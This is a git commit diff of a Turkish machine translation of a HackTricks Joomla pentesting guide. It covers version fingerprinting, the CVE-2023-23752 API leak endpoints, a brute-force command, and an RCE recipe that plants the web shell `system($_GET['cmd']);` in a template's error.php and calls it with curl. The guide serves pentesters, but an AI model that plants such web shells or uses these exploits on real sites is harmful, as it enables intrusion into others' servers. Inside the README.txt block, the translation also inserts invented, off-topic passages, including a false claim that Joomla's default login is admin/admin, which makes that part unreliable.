Translated ['network-services-pentesting/pentesting-web/joomla.md'] to t

This commit is contained in:
Translator 2024-04-10 11:57:32 +00:00
parent 37deb18755
commit bd8896ecc3

View file

@ -2,19 +2,19 @@
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> öğrenin!</strong></summary>
* Bir **cybersecurity şirketinde** çalışıyor musunuz? **Şirketinizi HackTricks'te reklamını görmek** ister misiniz? veya **PEASS'ın en son sürümüne veya HackTricks'i PDF olarak indirmek** ister misiniz? [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin.
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin.
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi [hacktricks repo](https://github.com/carlospolop/hacktricks) ve [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)'ya PR göndererek paylaşın**.
* **Bir siber güvenlik şirketinde mi çalışıyorsunuz? Şirketinizin HackTricks'te reklamını görmek ister misiniz? Ya da en son PEASS sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz?** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimizi**](https://opensea.io/collection/the-peass-family) görün
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* **[💬](https://emojipedia.org/speech-balloon/) Discord grubuna** katılın veya [telegram grubuna](https://t.me/peass) veya **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**'u takip edin.**
* **Hacking püf noktalarınızı paylaşarak [hacktricks repo](https://github.com/carlospolop/hacktricks) ve [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)** üzerinden PR gönderin.
</details>
### Joomla İstatistikleri
Joomla, Joomla kurulumlarında kullanılan Joomla, PHP ve veritabanı sürümlerinin ve sunucu işletim sistemlerinin dağılımı gibi bazı anonim [kullanım istatistikleri](https://developer.joomla.org/about/stats.html) toplar. Bu verilere, halka açık [API](https://developer.joomla.org/about/stats/api.html) aracılığıyla sorgu yapılabilir.
Joomla, Joomla kurulumlarında kullanılan Joomla, PHP ve veritabanı sürümlerinin ve sunucu işletim sistemlerinin ayrıntılı istatistiklerini toplar. Bu veriler, genel [API](https://developer.joomla.org/about/stats/api.html)leri üzerinden sorgulanabilir.
```bash
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
@ -44,30 +44,15 @@ curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
```
## Numaralandırma
### Keşif/Ayak İzi Alma
### Keşif/Ayak İzi
* **meta** etiketlerini kontrol edin.
* **meta** etiketlerini kontrol edin
```bash
curl https://www.joomla.org/ | grep Joomla | grep generator
<meta name="generator" content="Joomla! - Open Source Content Management" />
```
# robots.txt
Robots.txt dosyası, web sitenizin arama motorları tarafından taranmasını istemediğiniz belirli sayfaları veya dizinleri belirtmek için kullanılır. Bu dosya, web tarayıcılarına ve arama motorlarına hangi sayfaların taranabileceğini ve hangilerinin taranamayacağını söyler.
Robots.txt dosyası, web sitenizin kök dizininde bulunmalıdır. Arama motorları, bu dosyayı tarayarak hangi sayfaların taranabileceğini belirler. Bu dosya, web sitenizin güvenlik açıklarını ortaya çıkarmamak için dikkatli bir şekilde yapılandırılmalıdır.
Örneğin, aşağıdaki robots.txt dosyası, tüm arama motorlarının /gizli-dizin/ sayfasını taranmasını engeller:
```
User-agent: *
Disallow: /gizli-dizin/
```
Bu dosya, "User-agent" alanında "*" kullanarak tüm arama motorlarını hedef alır ve "Disallow" alanında "/gizli-dizin/" dizinini engeller.
Robots.txt dosyası, web sitenizin güvenliğini artırmak için kullanılabilecek bir araçtır. Ancak, bu dosyanın tamamen güvenli olduğunu varsaymamalısınız. Bir saldırgan, bu dosyayı kullanarak web sitenizin yapısını ve potansiyel güvenlik açıklarını keşfedebilir. Bu nedenle, robots.txt dosyanızı düzenlerken dikkatli olmalı ve hassas bilgileri ifşa etmemelisiniz.
* robots.txt
```
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
@ -79,29 +64,41 @@ Robots.txt dosyası, web sitenizin güvenliğini artırmak için kullanılabilec
```
* README.txt
# Joomla
---
Joomla, açık kaynaklı bir içerik yönetim sistemi (CMS) olan PHP tabanlı bir web uygulamasıdır. Joomla, kullanıcıların web sitelerini oluşturmasına, düzenlemesine ve yönetmesine olanak tanır. Bu bölümde, Joomla web uygulamalarını hedef alan pentesting tekniklerini öğreneceksiniz.
## Joomla
## Joomla Pentesting
### Joomla Version Identification
Joomla web uygulamalarını pentest etmek için aşağıdaki adımları izleyebilirsiniz:
Joomla version can be identified by checking the following files:
1. Joomla sürümünü belirleyin: Joomla sürümünü belirlemek, zayıf noktaları tespit etmek için önemlidir. Joomla sürümünü belirlemek için web sitesinin kaynak kodunu inceleyebilir veya Joomla'nın varsayılan dosya ve dizin yapısını kontrol edebilirsiniz.
- `administrator/manifests/files/joomla.xml`
- `libraries/joomla/version.php`
- `libraries/src/Version.php`
2. Joomla'nın varsayılan kullanıcı adı ve şifresini değiştirin: Joomla'nın varsayılan kullanıcı adı "admin" ve şifresi "admin"dir. Bu nedenle, yönetici hesabının varsayılan kullanıcı adı ve şifresini değiştirmek güvenlik açısından önemlidir.
### Joomla Vulnerability Scanning
3. Joomla eklentilerini kontrol edin: Joomla, çeşitli eklentilere sahiptir ve bu eklentiler güvenlik açıklarına neden olabilir. Joomla web uygulamasını pentest etmeden önce, kullanılan eklentileri kontrol etmek ve güncellemeleri kontrol etmek önemlidir.
1. Use tools like JoomScan to scan for vulnerabilities in Joomla websites.
2. Manually check for common vulnerabilities like SQL injection, XSS, and CSRF.
4. Joomla'nın güvenlik ayarlarını kontrol edin: Joomla'nın güvenlik ayarlarını kontrol etmek, web uygulamasının güvenliğini artırmak için önemlidir. Güvenlik ayarlarını kontrol etmek için Joomla'nın yönetici paneline erişebilir ve güvenlik ayarlarını inceleyebilirsiniz.
### Exploiting Joomla Vulnerabilities
5. Joomla'nın veritabanını inceleyin: Joomla web uygulamasının veritabanını incelemek, kullanıcı bilgilerini ve diğer hassas verileri ortaya çıkarmak için önemlidir. Veritabanını incelemek için SQL enjeksiyonu ve diğer veritabanı saldırı tekniklerini kullanabilirsiniz.
1. Exploit vulnerabilities like SQL injection by manipulating input fields.
2. Exploit XSS vulnerabilities by injecting malicious scripts into web pages.
3. Exploit CSRF vulnerabilities by tricking users into performing unintended actions.
6. Joomla'nın dosya ve dizin yapısını kontrol edin: Joomla'nın dosya ve dizin yapısını kontrol etmek, web uygulamasının güvenliğini değerlendirmek için önemlidir. Dosya ve dizin yapısını kontrol etmek için web sitesinin kaynak kodunu inceleyebilirsiniz.
### Joomla Password Cracking
7. Joomla'nın güvenlik açıklarını tespit etmek için otomatik araçlar kullanın: Joomla web uygulamalarını pentest etmek için otomatik araçlar kullanabilirsiniz. Bu araçlar, güvenlik açıklarını tespit etmek ve zayıf noktaları ortaya çıkarmak için kullanılabilir.
1. Use tools like Hashcat to crack Joomla password hashes.
2. Utilize password dictionaries and brute force attacks to crack weak passwords.
Bu adımları izleyerek Joomla web uygulamalarını pentest edebilir ve güvenlik açıklarını tespit edebilirsiniz. Ancak, pentest yaparken yasalara ve etik kurallara uymak önemlidir.
### Joomla Security Best Practices
1. Keep Joomla and its extensions up to date to patch known vulnerabilities.
2. Use strong and unique passwords for Joomla admin accounts.
3. Implement security extensions like firewall plugins to enhance Joomla security.
---
```
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
@ -111,43 +108,38 @@ Bu adımları izleyerek Joomla web uygulamalarını pentest edebilir ve güvenli
```
### Sürüm
* Joomla'nın sürümünü görmek için **/administrator/manifests/files/joomla.xml** dosyasına bakabilirsiniz.
* Joomla'nın sürümünü almak için **/language/en-GB/en-GB.xml** dosyasına bakabilirsiniz.
* Yaklaşık bir sürümü görmek için **plugins/system/cache/cache.xml** dosyasına bakabilirsiniz.
### Otomatik
* **/administrator/manifests/files/joomla.xml** dosyasında sürümü görebilirsiniz.
* **/language/en-GB/en-GB.xml** dosyasında Joomla'nın sürümünü alabilirsiniz.
* **plugins/system/cache/cache.xml** dosyasında yaklaşık bir sürümü görebilirsiniz.
```bash
droopescan scan joomla --url http://joomla-site.local/
```
In[ **80,443 - Pentesting Web Methodology**](./#cms-scanners) bölümünde Joomla taraması yapabilen CMS tarayıcıları hakkında bilgi verilmektedir.
### API Kimlik Doğrulaması Yapılmamış Bilgi Sızdırma:
4.0.0 ile 4.2.7 sürümleri, Kimlik doğrulaması yapılmamış bilgi sızdırma (CVE-2023-23752) açığına sahiptir ve kimlik bilgilerini ve diğer bilgileri sızdıracaktır.
### Brute-Force
* Kullanıcılar: `http://<host>/api/v1/users?public=true`
Giriş yapmak için brute force saldırısı yapmak için bu [script](https://github.com/ajnik/joomla-bruteforce) kullanılabilir.
* Yapılandırma Dosyası: `http://<host>/api/index.php/v1/config/application?public=true`
**MSF Modülü**: `scanner/http/joomla_api_improper_access_checks` veya ruby script: [51334](https://www.exploit-db.com/exploits/51334)
### Kaba Kuvvet Saldırısı
Giriş yapmak için bu [script'i](https://github.com/ajnik/joomla-bruteforce) kullanabilirsiniz.
```shell-session
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
admin:admin
```
## Uzaktan Kod Yürütme (RCE)
## RCE
Eğer **yönetici kimlik bilgilerine** sahip olduysanız, **RCE içinde** bulunmak için bir **PHP kodu parçacığı** ekleyebilirsiniz. Bunun için bir **şablonu özelleştirmemiz** gerekmektedir.
Eğer **yönetici kimlik bilgilerine** sahip olduysanız, **RCE içine girebilirsiniz** ve **RCE** elde etmek için bir **PHP kodu parçası ekleyebilirsiniz**. Bunun için bir **şablonu özelleştirerek** yapabiliriz.
1. `Yapılandırma` altında sol alt köşede bulunan **`Şablonlar`** üzerine **tıklayın** ve şablon menüsünü açın.
2. **`Şablon`** sütunu başlığı altında **`protostar`** şablonunu seçin. Bu bizi **`Şablonlar: Özelleştir`** sayfasına götürecektir.
3. Son olarak, **sayfa kaynağını** açmak için bir sayfaya **tıklayabilirsiniz**. **`error.php`** sayfasını seçelim. Aşağıdaki gibi **PHP tek satırlık bir kod ekleyerek kod yürütme** yapacağız:
1. **`system($_GET['cmd']);`**
1. `Yapılandırma` altında alt sol köşede **`Şablonlar`** üzerine **tıklayın** ve şablonlar menüsünü açın.
2. Bir **şablon adına tıklayın**. `Şablon` sütunu başlığı altında **`protostar`**'ı seçelim. Bu bizi **`Şablonlar: Özelleştir`** sayfasına götürecektir.
3. Son olarak, **sayfa kaynağını açmak için** bir sayfaya tıklayabilirsiniz. **`error.php`** sayfasını seçelim. Aşağıdaki gibi **kod yürütme elde etmek için PHP tek satırlık bir kod ekleyeceğiz**:
```php
system($_GET['cmd']);
```
4. **Kaydet ve Kapat**
5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin!</summary>
* Bir **cybersecurity şirketinde** çalışıyor musunuz? **Şirketinizi HackTricks'te reklamını görmek** ister misiniz? veya **PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek** ister misiniz? [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuz olan özel [**NFT'leri**](https://opensea.io/collection/the-peass-family) keşfedin.
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin.
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter**'da beni takip edin 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Hacking hilelerinizi [hacktricks repo](https://github.com/carlospolop/hacktricks) ve [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)'ya PR göndererek paylaşın**.
</details>